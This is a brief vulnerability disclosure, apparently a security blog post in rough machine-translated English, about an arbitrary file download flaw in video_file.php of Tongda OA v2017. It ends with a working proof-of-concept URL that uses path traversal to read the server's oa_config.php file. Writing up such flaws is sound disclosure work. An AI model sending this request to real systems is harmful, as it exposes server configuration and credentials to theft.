Tongda Oa V2017 Video_file Php Any File Download Vulnerability
Tongda Oa V2017 Video_file Php Any File Download Vulnerability
Tongda OA v2017 video_file.php any file download vulnerability
Vulnerability Description
The Tongda OA v2017 video_file.php file has arbitrary file download vulnerability, and the attacker can read the server sensitive files through the vulnerability.
Vulnerability Impact
Tongda OA v2017
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
This post is licensed under CC BY 4.0 by the author.